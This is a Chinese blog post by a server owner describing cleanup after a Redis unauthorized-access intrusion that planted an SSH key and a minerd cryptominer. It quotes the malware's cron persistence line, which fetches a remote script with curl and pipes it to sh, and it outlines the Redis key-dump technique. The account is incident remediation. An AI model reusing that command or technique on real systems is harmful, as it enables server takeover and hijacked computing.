redis minerd入侵

突然发现用key不能登陆服务器了,有点慌,到.ssh目录下一看,果然被入侵了。

除了authorized_keys被修改外,还多出一个文件:

blob.png

同时,/etc/ssh/sshd_config被追加了:

blob.png

把AuthorizedKeysFile给指定到了KHK75NEOiq,导致我自己的key没法使用了。

如何被入侵的?

前段时间有一个特别火热的redis漏洞,利用redis未授权访问,然后将key dump到用户的.ssh目录下,从而实现控制服务器。

尝试解决:

对redis做了认证,然后把.ssh文件夹下的所有文件都删除了,重新生成密钥。以为问题已经解决了。谁知一段时间后,KHK75NEOiq又自动生成了。查了一些资料,确定一个可疑进程(貌似是用来挖比特币的):

blob.png

占用几乎全部cpu资源,同时写入了一个计划任务:

blob.png

然后尝试了:

  1. 将计划任务清掉重启

  2. 将/opt下相关文件都删掉

  3. kill掉minerd进程

发现KHK75NEOiq已经不自动生成了,但是minerd这个进程还是会被自动启动。

google了一会:

  1. On monkeyoto's suggestion, I blocked all communication with the mining pool server - iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.(禁止访问minerd服务器)

  2. Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root.(只发现/var/spool/crontabs/root下有这个任务,我直接将root删除了)

  3. Removed the directory /opt/yam.(没有发现这个目录,怕目录转移了,对磁盘搜索了一次,还是没有yam这个东西)

  4. Removed /root/.ssh/KHK75NEOiq.(已删除)

  5. Deleted the files /opt/minerd and /opt/KHK75NEOiq33.(已删除)

  6. Stopped the minerd process - pkill minerd.

  7. Stopped lady - service lady stop.(没有发现这个service)

照着做了一次,还是没有解决问题,minerd持续自动启动。

真是烦透了,直接把minerd可执行权限给搞掉了:chmod -x /opt/minerd,发现minerd没有再自动启动了。

继续观察中...

 

参考:

http://security.stackexchange.com/questions/129448/how-can-i-kill-minerd-malware-on-an-aws-ec2-instance

http://blog.csdn.net/hu_wen/article/details/51908597

发表评论